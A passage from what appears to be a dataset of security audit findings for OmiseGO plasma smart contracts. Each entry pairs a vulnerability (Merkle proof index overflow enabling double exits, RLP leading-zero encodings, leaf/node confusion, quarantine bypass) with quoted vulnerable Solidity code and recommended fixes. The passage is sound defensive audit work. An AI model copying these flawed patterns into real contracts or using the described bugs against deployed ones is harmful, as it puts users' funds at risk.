expect(nextResult).to.be.true;\\n\\n const nextNextResult = await this.merkleContract.checkMembership(\\n leaves[2],\\n 10,\\n rootHash,\\n proof,\\n );\\n expect(nextNextResult).to.be.true;\\n});\\n```\\n\\nConclusion\\nExit processing is meant to bypass exits processed more than once. This is implemented using an “output id” system, where each exited output should correspond to a unique id that gets flagged in the `ExitGameController` contract as it's exited. Before an exit is processed, its output id is calculated and checked against `ExitGameController`. If the output has already been exited, the exit being processed is deleted and skipped. Crucially, output id is calculated differently for standard transactions and deposit transactions: deposit output ids factor in the transaction index.\\nBy using the behavior described in this issue in conjunction with methods discussed in issue 5.8 and https://github.com/ConsenSys/omisego-morevp-audit-2019-10/issues/20, we showed that deposit transactions can be exited twice using indices `0` and `2**16`. Because of the distinct output id calculation, these exits have different output ids and can be processed twice, allowing users to exit double their deposited amount.\\nA modified `StandardExit.load.test.js` shows that exits are successfully enqueued with a transaction index of 65536: https://gist.github.com/wadeAlexC/4ad459b7510e512bc9556e7c919e0965#file-standardexit-load-test-js-L55чUse the length of the proof to determine the maximum allowed index. The passed-in index should satisfy the following criterion: `index < 2**(proof.length/32)`. Additionally, ensure range checks on transaction position decoding are sufficiently restrictive (see https://github.com/ConsenSys/omisego-morevp-audit-2019-10/issues/20).\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/546чч```\\nuint256 j = index;\\n// Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\nfor (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(NODE\\_SALT, proofElement, computedHash));\\n }\\n j = j / 2;\\n}\\n```\\n -Improper initialization of spending condition abstraction allows “v2 transactions” to exit using PaymentExitGameчhighч`PaymentOutputToPaymentTxCondition` is an abstraction around the transaction signature check needed for many components of the exit games. Its only function, `verify`, returns `true` if one transaction (inputTxBytes) is spent by another transaction (spendingTxBytes):\\n```\\nfunction verify(\\n bytes calldata inputTxBytes,\\n uint16 outputIndex,\\n uint256 inputTxPos,\\n bytes calldata spendingTxBytes,\\n uint16 inputIndex,\\n bytes calldata signature,\\n bytes calldata /\\*optionalArgs\\*/\\n)\\n external\\n view\\n returns (bool)\\n{\\n PaymentTransactionModel.Transaction memory inputTx = PaymentTransactionModel.decode(inputTxBytes);\\n require(inputTx.txType == supportInputTxType, \"Input tx is an unsupported payment tx type\");\\n\\n PaymentTransactionModel.Transaction memory spendingTx = PaymentTransactionModel.decode(spendingTxBytes);\\n require(spendingTx.txType == supportSpendingTxType, \"The spending tx is an unsupported payment tx type\");\\n\\n UtxoPosLib.UtxoPos memory utxoPos = UtxoPosLib.build(TxPosLib.TxPos(inputTxPos), outputIndex);\\n require(\\n spendingTx.inputs[inputIndex] == bytes32(utxoPos.value),\\n \"Spending tx points to the incorrect output UTXO position\"\\n );\\n\\n address payable owner = inputTx.outputs[outputIndex].owner();\\n require(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), \"Tx in not signed correctly\");\\n\\n return true;\\n}\\n```\\n\\nVerification process\\nThe verification process is relatively straightforward. The contract performs some basic input validation, checking that the input transaction's `txType` matches `supportInputTxType`, and that the spending transaction's `txType` matches `supportSpendingTxType`. These values are set during construction.\\nNext, `verify` checks that the spending transaction contains an input that matches the position of one of the input transaction's outputs.\\nFinally, `verify` performs an EIP-712 hash on the spending transaction, and ensures it is signed by the owner of the output in question.\\nImplications of the abstraction\\nThe abstraction used requires several files to be visited to fully understand the function of each line of code: `ISpendingCondition`, `PaymentEIP712Lib`, `UtxoPosLib`, `TxPosLib`, `PaymentTransactionModel`, `PaymentOutputModel`, `RLPReader`, `ECDSA`, and `SpendingConditionRegistry`. Additionally, the abstraction obfuscates the underlying spending condition verification primitive where used.\\nFinally, understanding the abstraction requires an understanding of how `SpendingConditionRegistry` is initialized, as well as the nature of its relationship with `PlasmaFramework` and `ExitGameRegistry`. The aforementioned `txType` values, `supportInputTxType` and `supportSpendingTxType`, are set during construction. Their use in `ExitGameRegistry` seems to suggest they are intended to represent different versions of transaction types, and that separate exit game contracts are meant to handle different transaction types:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, \"Should not register with tx type 0\");\\n require(\\_contract != address(0), \"Should not register with an empty exit game address\");\\n require(\\_exitGames[\\_txType] == address(0), \"The tx type is already registered\");\\n require(\\_exitGameToTxType[\\_contract] == 0, \"The exit game contract is already registered\");\\n require(Protocol.isValidProtocol(\\_protocol), \"Invalid protocol value\");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nMigration and initialization\\nThe migration script seems to corroborate this interpretation:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L109-L124\\n```\\n// handle spending condition\\nawait deployer.deploy(\\n PaymentOutputToPaymentTxCondition,\\n plasmaFramework.address,\\n PAYMENT\\_OUTPUT\\_TYPE,\\n PAYMENT\\_TX\\_TYPE,\\n);\\nconst paymentToPaymentCondition = await PaymentOutputToPaymentTxCondition.deployed();\\n\\nawait deployer.deploy(\\n PaymentOutputToPaymentTxCondition,\\n plasmaFramework.address,\\n PAYMENT\\_OUTPUT\\_TYPE,\\n PAYMENT\\_V2\\_TX\\_TYPE,\\n);\\nconst paymentToPaymentV2Condition = await PaymentOutputToPaymentTxCondition.deployed();\\n```\\n\\nThe migration script shown above deploys two different versions of `PaymentOutputToPaymentTxCondition`. The first sets `supportInputTxType` and `supportSpendingTxType` to `PAYMENT_OUTPUT_TYPE` and `PAYMENT_TX_TYPE`, respectively. The second sets those same variables to `PAYMENT_OUTPUT_TYPE` and `PAYMENT_V2_TX_TYPE`, respectively.\\nThe migration script then registers both of these contracts in `SpendingConditionRegistry`, and then calls `renounceOwnership`, freezing the spending conditions registered permanently:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L126-L135\\n```\\nconsole.log(`Registering paymentToPaymentCondition (${paymentToPaymentCondition.address}) to spendingConditionRegistry`);\\nawait spendingConditionRegistry.registerSpendingCondition(\\n PAYMENT\\_OUTPUT\\_TYPE, PAYMENT\\_TX\\_TYPE, paymentToPaymentCondition.address,\\n);\\n\\nconsole.log(`Registering paymentToPaymentV2Condition (${paymentToPaymentV2Condition.address}) to spendingConditionRegistry`);\\nawait spendingConditionRegistry.registerSpendingCondition(\\n PAYMENT\\_OUTPUT\\_TYPE, PAYMENT\\_V2\\_TX\\_TYPE, paymentToPaymentV2Condition.address,\\n);\\nawait spendingConditionRegistry.renounceOwnership();\\n```\\n\\nFinally, the migration script registers a single exit game contract in PlasmaFramework:\\ncode/plasma_framework/migrations/5_deploy_and_register_payment_exit_game.js:L137-L143\\n```\\n// register the exit game to framework\\nawait plasmaFramework.registerExitGame(\\n PAYMENT\\_TX\\_TYPE,\\n paymentExitGame.address,\\n config.frameworks.protocols.moreVp,\\n { from: maintainerAddress },\\n);\\n```\\n\\nNote that the associated `_txType` is permanently associated with the deployed exit game contract:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, \"Should not register with tx type 0\");\\n require(\\_contract != address(0), \"Should not register with an empty exit game address\");\\n require(\\_exitGames[\\_txType] == address(0), \"The tx type is already registered\");\\n require(\\_exitGameToTxType[\\_contract] == 0, \"The exit game contract is already registered\");\\n require(Protocol.isValidProtocol(\\_protocol), \"Invalid protocol value\");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nConclusion\\nCrucially, this association is never used. It is implied heavily that transactions with some `txType` must use a certain registered exit game contract. In fact, this is not true. When using `PaymentExitGame`, its routers, and their associated controllers, the `txType` is invariably inferred from the encoded transaction, not from the mappings in `ExitGameRegistry`. If initialized as-is, both `PAYMENT_TX_TYPE` and `PAYMENT_V2_TX_TYPE` transactions may be exited using `PaymentExitGame`, provided they exist in the plasma chain.чRemove `PaymentOutputToPaymentTxCondition` and `SpendingConditionRegistry`\\nImplement checks for specific spending conditions directly in exit game controllers. Emphasize clarity of function: ensure it is clear when called from the top level that a signature verification check and spending condition check are being performed.\\nIf the inferred relationship between `txType` and `PaymentExitGame` is correct, ensure that each `PaymentExitGame` router checks for its supported `txType`. Alternatively, the check could be made in `PaymentExitGame` itself.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/472чч```\\nfunction verify(\\n bytes calldata inputTxBytes,\\n uint16 outputIndex,\\n uint256 inputTxPos,\\n bytes calldata spendingTxBytes,\\n uint16 inputIndex,\\n bytes calldata signature,\\n bytes calldata /\\*optionalArgs\\*/\\n)\\n external\\n view\\n returns (bool)\\n{\\n PaymentTransactionModel.Transaction memory inputTx = PaymentTransactionModel.decode(inputTxBytes);\\n require(inputTx.txType == supportInputTxType, \"Input tx is an unsupported payment tx type\");\\n\\n PaymentTransactionModel.Transaction memory spendingTx = PaymentTransactionModel.decode(spendingTxBytes);\\n require(spendingTx.txType == supportSpendingTxType, \"The spending tx is an unsupported payment tx type\");\\n\\n UtxoPosLib.UtxoPos memory utxoPos = UtxoPosLib.build(TxPosLib.TxPos(inputTxPos), outputIndex);\\n require(\\n spendingTx.inputs[inputIndex] == bytes32(utxoPos.value),\\n \"Spending tx points to the incorrect output UTXO position\"\\n );\\n\\n address payable owner = inputTx.outputs[outputIndex].owner();\\n require(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), \"Tx in not signed correctly\");\\n\\n return true;\\n}\\n```\\n -RLPReader - Leading zeroes allow multiple valid encodings and exit / output ids for the same transactionчhighчThe current implementation of RLP decoding can take 2 different `txBytes` and decode them to the same structure. Specifically, the `RLPReader.toUint` method can decode 2 different types of bytes to the same number. For example:\\n`0x821234` is decoded to `uint(0x1234)`\\n`0x83001234` is decoded to `uint(0x1234)`\\n`0xc101` can decode to `uint(1)`, even though the tag specifies a short list\\n`0x01` can decode to `uint(1)`, even though the tag specifies a single byte\\nAs explanation for this encoding:\\n`0x821234` is broken down into 2 parts:\\n`0x82` - represents `0x80` (the string tag) + `0x02` bytes encoded\\n`0x1234` - are the encoded bytes\\nThe same for 0x83001234:\\n`0x83` - represents `0x80` (the string tag) + `0x03` bytes encoded\\n`0x001234` - are the encoded bytes\\nThe current implementation casts the encoded bytes into a uint256, so these different encodings are interpreted by the contracts as the same number:\\n`uint(0x1234) = uint(0x001234)`\\n```\\nresult := mload(memPtr)\\n```\\n\\nHaving different valid encodings for the same data is a problem because the encodings are used to create hashes that are used as unique ids. This means that multiple ids can be created for the same data. The data should only have one possible id.\\nThe encoding is used to create ids in these parts of the code:\\n```\\nreturn keccak256(abi.encodePacked(\\_txBytes, \\_outputIndex, \\_utxoPosValue));\\n```\\n\\n```\\nreturn keccak256(abi.encodePacked(\\_txBytes, \\_outputIndex));\\n```\\n\\n```\\nbytes32 hashData = keccak256(abi.encodePacked(\\_txBytes, \\_utxoPos.value));\\n```\\n\\n```\\nreturn uint160((uint256(keccak256(\\_txBytes)) 105).setBit(151));\\n```\\n\\n```\\nbytes32 leafData = keccak256(data.txBytes);\\n```\\n\\nOther methods that are affected because they rely on the return values of these methods:чEnforce strict-length decoding for `txBytes`, and specify that `uint` is decoded from a 32-byte short string.\\nEnforcing a 32-byte length for `uint` means that `0x1234` should always be encoded as:\\n`0xa00000000000000000000000000000000000000000000000000000000000001234`\\n`0xa0` represents the tag + the length: `0x80 + 32`\\n`0000000000000000000000000000000000000000000000000000000000001234` is the number 32 bytes long with leading zeroes\\nUnfortunately, using leading zeroes is against the RLP spec:\\nhttps://github.com/ethereum/wiki/wiki/RLP\\npositive RLP integers must be represented in big endian binary form with no leading zeroes\\nThis means that libraries interacting with OMG contracts which are going to correctly and fully implement the spec will generate “incorrect” encodings for uints; encodings that are not going to be recognized by the OMG contracts.\\nFully correct spec encoding: `0x821234`. Proposed encoding in this solution: `0xa00000000000000000000000000000000000000000000000000000000000001234`.\\nSimilarly enforce restrictions where they can be added; this is possible because of the strict structure format that needs to be encoded.\\nSome other potential solutions are included below. Note that these solutions are not recommended for reasons included below:\\nNormalize the encoding that gets passed to methods that hash the transaction for use as an id:\\nThis can be implemented in the methods that call `keccak256` on `txBytes` and should decode and re-encode the passed `txBytes` in order to normalize the passed encoding.\\na `txBytes` is passed\\nthe `txBytes` are decoded into structure: `tmpDecodedStruct` = decode(txBytes)\\nthe `tmpDecodedStruct` is re-encoded in order to normalize it: `normalizedTxBytes = encode(txBytes)`\\nThis method is not recommended because it needs a Solidity encoder to be implemented and a lot of gas will be used to decode and re-encode the initial `txBytes`.\\nCorrectly and fully implement RLP decoding\\nThis is another solution that adds a lot of code and is prone to errors.\\nThe solution would be to enforce all of the restrictions when decoding and not accept any encoding that doesn't fully follow the spec. This for example means that is should not accept uints with leading zeroes.\\nThis is a problem because it needs a lot of code that is not easy to write in Solidity (or EVM).чч```\\nresult := mload(memPtr)\\n```\\n -Recommendation: Remove TxFinalizationModel and TxFinalizationVerifier. Implement stronger checks in Merkleчmediumч`TxFinalizationVerifier` is an abstraction around the block inclusion check needed for many of the features of plasma exit games. It uses a struct defined in `TxFinalizationModel` as inputs to its two functions: `isStandardFinalized` and `isProtocolFinalized`.\\n`isStandardFinalized` returns the result of an inclusion proof. Although there are several branches, only the first is used:\\n```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is \"standard finalized\"\\n\\* @dev MVP: requires that both inclusion proof and confirm signature is checked\\n\\* @dev MoreVp: checks inclusion proof only\\n\\*/\\nfunction isStandardFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return checkInclusionProof(data);\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(\"MVP is not yet supported\");\\n } else {\\n revert(\"Invalid protocol value\");\\n }\\n}\\n```\\n\\n`isProtocolFinalized` is unused:\\n```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is \"protocol finalized\"\\n\\* @dev MVP: must be standard finalized\\n\\* @dev MoreVp: allows in-flight tx, so only checks for the existence of the transaction\\n\\*/\\nfunction isProtocolFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return data.txBytes.length > 0;\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(\"MVP is not yet supported\");\\n } else {\\n revert(\"Invalid protocol value\");\\n }\\n}\\n```\\n\\nThe abstraction used introduces branching logic and requires several files to be visited to fully understand the function of each line of code: `ITxFinalizationVerifier`, `TxFinalizationModel`, `TxPosLib`, `Protocol`, `BlockController`, and `Merkle`. Additionally, the abstraction obfuscates the underlying inclusion proof primitive when used in the exit game contracts. `isStandardFinalized` is not clearly an inclusion proof, and `isProtocolFinalized` simply adds confusion.\\n```\\nfunction checkInclusionProof(Model.Data memory data) private view returns (bool) {\\n if (data.inclusionProof.length == 0) {\\n return false;\\n }\\n\\n (bytes32 root,) = data.framework.blocks(data.txPos.blockNum());\\n bytes32 leafData = keccak256(data.txBytes);\\n return Merkle.checkMembership(\\n leafData, data.txPos.txIndex(), root, data.inclusionProof\\n );\\n}\\n```\\n\\nBy introducing the abstraction of `TxFinalizationVerifier`, the input validation performed by `Merkle` is split across multiple files, and the reasonable-seeming decision of calling `Merkle.checkMembership` directly becomes unsafe. In fact, this occurs in one location in the contracts:\\n```\\nfunction verifyAndDeterminePositionOfTransactionIncludedInBlock(\\n bytes memory txbytes,\\n UtxoPosLib.UtxoPos memory utxoPos,\\n bytes32 root,\\n bytes memory inclusionProof\\n)\\n private\\n pure\\n returns(uint256)\\n{\\n bytes32 leaf = keccak256(txbytes);\\n require(\\n Merkle.checkMembership(leaf, utxoPos.txIndex(), root, inclusionProof),\\n \"Transaction is not included in block of Plasma chain\"\\n );\\n\\n return utxoPos.value;\\n}\\n```\\nчPaymentChallengeIFEOutputSpent.verifyInFlightTransactionStandardFinalized:\\n```\\nrequire(controller.txFinalizationVerifier.isStandardFinalized(finalizationData), \"In-flight transaction not finalized\");\\n```\\n\\nPaymentChallengeIFENotCanonical.verifyCompetingTxFinalized:\\n```\\nrequire(self.txFinalizationVerifier.isStandardFinalized(finalizationData), \"Failed to verify the position of competing tx\");\\n```\\n\\nPaymentStartInFlightExit.verifyInputTransactionIsStandardFinalized:\\n```\\nrequire(exitData.controller.txFinalizationVerifier.isStandardFinalized(finalizationData),\\n \"Input transaction is not standard finalized\");\\n```\\n\\nIf none of the above recommendations are implemented, ensure that `PaymentChallengeIFENotCanonical` uses the abstraction `TxFinalizationVerifier` so that a length check is performed on the inclusion proof.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/471чч```\\n/\\*\\*\\n\\* @notice Checks whether a transaction is \"standard finalized\"\\n\\* @dev MVP: requires that both inclusion proof and confirm signature is checked\\n\\* @dev MoreVp: checks inclusion proof only\\n\\*/\\nfunction isStandardFinalized(Model.Data memory data) public view returns (bool) {\\n if (data.protocol == Protocol.MORE\\_VP()) {\\n return checkInclusionProof(data);\\n } else if (data.protocol == Protocol.MVP()) {\\n revert(\"MVP is not yet supported\");\\n } else {\\n revert(\"Invalid protocol value\");\\n }\\n}\\n```\\n -Merkle - The implementation does not enforce inclusion of leaf nodes.чmediumчA observation with the current Merkle tree implementation is that it may be possible to validate nodes other than leaves. This is done by providing `checkMembership` with a reference to a hash within the tree, rather than a leaf.\\n```\\n/\\*\\*\\n \\* @notice Checks that a leaf hash is contained in a root hash\\n \\* @param leaf Leaf hash to verify\\n \\* @param index Position of the leaf hash in the Merkle tree\\n \\* @param rootHash Root of the Merkle tree\\n \\* @param proof A Merkle proof demonstrating membership of the leaf hash\\n \\* @return True, if the leaf hash is in the Merkle tree; otherwise, False\\n\\*/\\nfunction checkMembership(bytes32 leaf, uint256 index, bytes32 rootHash, bytes memory proof)\\n internal\\n pure\\n returns (bool)\\n{\\n require(proof.length % 32 == 0, \"Length of Merkle proof must be a multiple of 32\");\\n\\n bytes32 proofElement;\\n bytes32 computedHash = leaf;\\n uint256 j = index;\\n // Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\n for (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(proofElement, computedHash));\\n }\\n j = j / 2;\\n }\\n\\n return computedHash == rootHash;\\n}\\n```\\n\\nThe current implementation will validate the provided “leaf” and return `true`. This is a known problem of Merkle trees https://en.wikipedia.org/wiki/Merkle_tree#Second_preimage_attack.\\nProvide a hash from within the Merkle tree as the `leaf` argument. The index has to match the index of that node in regards to its current level in the tree. The `rootHash` has to be the correct Merkle tree `rootHash`. The proof has to skip the necessary number of levels because the nodes “underneath” the provided “leaf” will not be processed.чA remediation needs a fixed Merkle tree size as well as the addition of a byte prepended to each node in the tree. Another way would be to create a structure for the Merkle node and mark it as `leaf` or no `leaf`.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/425чч```\\n/\\*\\*\\n \\* @notice Checks that a leaf hash is contained in a root hash\\n \\* @param leaf Leaf hash to verify\\n \\* @param index Position of the leaf hash in the Merkle tree\\n \\* @param rootHash Root of the Merkle tree\\n \\* @param proof A Merkle proof demonstrating membership of the leaf hash\\n \\* @return True, if the leaf hash is in the Merkle tree; otherwise, False\\n\\*/\\nfunction checkMembership(bytes32 leaf, uint256 index, bytes32 rootHash, bytes memory proof)\\n internal\\n pure\\n returns (bool)\\n{\\n require(proof.length % 32 == 0, \"Length of Merkle proof must be a multiple of 32\");\\n\\n bytes32 proofElement;\\n bytes32 computedHash = leaf;\\n uint256 j = index;\\n // Note: We're skipping the first 32 bytes of `proof`, which holds the size of the dynamically sized `bytes`\\n for (uint256 i = 32; i <= proof.length; i += 32) {\\n // solhint-disable-next-line no-inline-assembly\\n assembly {\\n proofElement := mload(add(proof, i))\\n }\\n if (j % 2 == 0) {\\n computedHash = keccak256(abi.encodePacked(computedHash, proofElement));\\n } else {\\n computedHash = keccak256(abi.encodePacked(proofElement, computedHash));\\n }\\n j = j / 2;\\n }\\n\\n return computedHash == rootHash;\\n}\\n```\\n -Maintainer can bypass exit game quarantine by registering not-yet-deployed contractsчmediumчThe plasma framework uses an `ExitGameRegistry` to allow the maintainer to add new exit games after deployment. An exit game is any arbitrary contract. In order to prevent the maintainer from adding malicious exit games that steal user funds, the framework uses a “quarantine” system whereby newly-registered exit games have restricted permissions until their quarantine period has expired. The quarantine period is by default `3 * minExitPeriod`, and is intended to facilitate auditing of the new exit game's functionality by the plasma users.\\nHowever, by registering an exit game at a contract which has not yet been deployed, the maintainer can prevent plasma users from auditing the game until the quarantine period has expired. After the quarantine period has expired, the maintainer can deploy the malicious exit game and immediately steal funds.\\nExplanation\\nExit games are registered in the following function, callable only by the plasma contract maintainer:\\n```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, \"Should not register with tx type 0\");\\n require(\\_contract != address(0), \"Should not register with an empty exit game address\");\\n require(\\_exitGames[\\_txType] == address(0), \"The tx type is already registered\");\\n require(\\_exitGameToTxType[\\_contract] == 0, \"The exit game contract is already registered\");\\n require(Protocol.isValidProtocol(\\_protocol), \"Invalid protocol value\");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n\\nNotably, the function does not check the `extcodesize` of the submitted contract. As such, the maintainer can submit the address of a contract which does not yet exist and is not auditable.\\nAfter at least `3 * minExitPeriod` seconds pass, the submitted contract now has full permissions as a registered exit game and can pass all checks using the `onlyFromNonQuarantinedExitGame` modifier:\\n```\\n/\\*\\*\\n \\* @notice A modifier to verify that the call is from a non-quarantined exit game\\n \\*/\\nmodifier onlyFromNonQuarantinedExitGame() {\\n require(\\_exitGameToTxType[msg.sender] != 0, \"The call is not from a registered exit game contract\");\\n require(!\\_exitGameQuarantine.isQuarantined(msg.sender), \"ExitGame is quarantined\");\\n \\_;\\n}\\n```\\n\\nAdditionally, the submitted contract passes checks made by external contracts using the `isExitGameSafeToUse` function:\\n```\\n/\\*\\*\\n \\* @notice Checks whether the contract is safe to use and is not under quarantine\\n \\* @dev Exposes information about exit games quarantine\\n \\* @param \\_contract Address of the exit game contract\\n \\* @return boolean Whether the contract is safe to use and is not under quarantine\\n \\*/\\nfunction isExitGameSafeToUse(address \\_contract) public view returns (bool) {\\n return \\_exitGameToTxType[\\_contract] != 0 && !\\_exitGameQuarantine.isQuarantined(\\_contract);\\n}\\n```\\n\\nThese permissions allow a registered quarantine to:\\nWithdraw any users' tokens from ERC20Vault:\\n```\\nfunction withdraw(address payable receiver, address token, uint256 amount) external onlyFromNonQuarantinedExitGame {\\n IERC20(token).safeTransfer(receiver, amount);\\n emit Erc20Withdrawn(receiver, token, amount);\\n}\\n```\\n\\nWithdraw any users' ETH from EthVault:\\n```\\nfunction withdraw(address payable receiver, uint256 amount) external onlyFromNonQuarantinedExitGame {\\n // we do not want to block exit queue if transfer is unucessful\\n // solhint-disable-next-line avoid-call-value\\n (bool success, ) = receiver.call.value(amount)(\"\");\\n if (success) {\\n emit EthWithdrawn(receiver, amount);\\n } else {\\n emit WithdrawFailed(receiver, amount);\\n }\\n```\\n\\nActivate and deactivate the `ExitGameController` reentrancy mutex:\\n```\\nfunction activateNonReentrant() external onlyFromNonQuarantinedExitGame() {\\n require(!mutex, \"Reentrant call\");\\n mutex = true;\\n}\\n```\\n\\n```\\nfunction deactivateNonReentrant() external onlyFromNonQuarantinedExitGame() {\\n require(mutex, \"Not locked\");\\n mutex = false;\\n}\\n```\\n\\n`enqueue` arbitrary exits:\\n```\\nfunction enqueue(\\n uint256 vaultId,\\n address token,\\n uint64 exitableAt,\\n TxPosLib.TxPos calldata txPos,\\n uint160 exitId,\\n IExitProcessor exitProcessor\\n)\\n external\\n onlyFromNonQuarantinedExitGame\\n returns (uint256)\\n{\\n bytes32 key = exitQueueKey(vaultId, token);\\n require(hasExitQueue(key), \"The queue for the (vaultId, token) pair is not yet added to the Plasma framework\");\\n PriorityQueue queue = exitsQueues[key];\\n\\n uint256 priority = ExitPriority.computePriority(exitableAt, txPos, exitId);\\n\\n queue.insert(priority);\\n delegations[priority] = exitProcessor;\\n\\n emit ExitQueued(exitId, priority);\\n return priority;\\n}\\n```\\n\\nFlag outputs as “spent”:\\n```\\nfunction flagOutputSpent(bytes32 \\_outputId) external onlyFromNonQuarantinedExitGame {\\n require(\\_outputId != bytes32(\"\"), \"Should not flag with empty outputId\");\\n isOutputSpent[\\_outputId] = true;\\n}\\n```\\nч`registerExitGame` should check that `extcodesize` of the submitted contract is non-zero.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/410чч```\\n/\\*\\*\\n \\* @notice Registers an exit game within the PlasmaFramework. Only the maintainer can call the function.\\n \\* @dev Emits ExitGameRegistered event to notify clients\\n \\* @param \\_txType The tx type where the exit game wants to register\\n \\* @param \\_contract Address of the exit game contract\\n \\* @param \\_protocol The transaction protocol, either 1 for MVP or 2 for MoreVP\\n \\*/\\nfunction registerExitGame(uint256 \\_txType, address \\_contract, uint8 \\_protocol) public onlyFrom(getMaintainer()) {\\n require(\\_txType != 0, \"Should not register with tx type 0\");\\n require(\\_contract != address(0), \"Should not register with an empty exit game address\");\\n require(\\_exitGames[\\_txType] == address(0), \"The tx type is already registered\");\\n require(\\_exitGameToTxType[\\_contract] == 0, \"The exit game contract is already registered\");\\n require(Protocol.isValidProtocol(\\_protocol), \"Invalid protocol value\");\\n\\n \\_exitGames[\\_txType] = \\_contract;\\n \\_exitGameToTxType[\\_contract] = \\_txType;\\n \\_protocols[\\_txType] = \\_protocol;\\n \\_exitGameQuarantine.quarantine(\\_contract);\\n\\n emit ExitGameRegistered(\\_txType, \\_contract, \\_protocol);\\n}\\n```\\n -EthVault - Unused state variableчlowчThe state variable `withdrawEntryCounter` is not used in the code.\\n```\\nuint256 private withdrawEntryCounter = 0;\\n```\\nчRemove it from the contract.чч```\\nuint256 private withdrawEntryCounter = 0;\\n```\\n -ECDSA error value is not handledчlowчResolution\\nThis was addressed in commit 32288ccff5b867a7477b4eaf3beb0587a4684d7a by adding a check that the returned value is nonzero.\\nThe OpenZeppelin `ECDSA` library returns `address(0x00)` for many cases with malformed signatures:\\n```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n return address(0);\\n}\\n\\nif (v != 27 && v != 28) {\\n return address(0);\\n}\\n```\\n\\nThe `PaymentOutputToPaymentTxCondition` contract does not explicitly handle this case:\\n```\\naddress payable owner = inputTx.outputs[outputIndex].owner();\\nrequire(owner == ECDSA.recover(eip712.hashTx(spendingTx), signature), \"Tx in not signed correctly\");\\n\\nreturn true;\\n```\\nчAdding a check to handle this case will make it easier to reason about the code.\\nCorresponding issue in plasma-contracts repo: https://github.com/omisego/plasma-contracts/issues/454чч```\\nif (uint256(s) > 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF5D576E7357A4501DDFE92F46681B20A0) {\\n return address(0);\\n}\\n\\nif (v != 27 && v != 28) {\\n return address(0);\\n}\\n```\\n -No existence checks on framework block and timestamp readsчlowчThe exit game libraries make several queries to the main `PlasmaFramework` contract where plasma block hashes and timestamps are stored. In multiple locations, the return values of these queries are not checked for existence.\\nPaymentStartStandardExit.setupStartStandardExitData:\\n```\\n(, uint256 blockTimestamp) = controller.framework.blocks(utxoPos.blockNum());\\n```\\n\\nPaymentChallengeIFENotCanonical.respond:\\n```\\n(bytes32 root, ) = 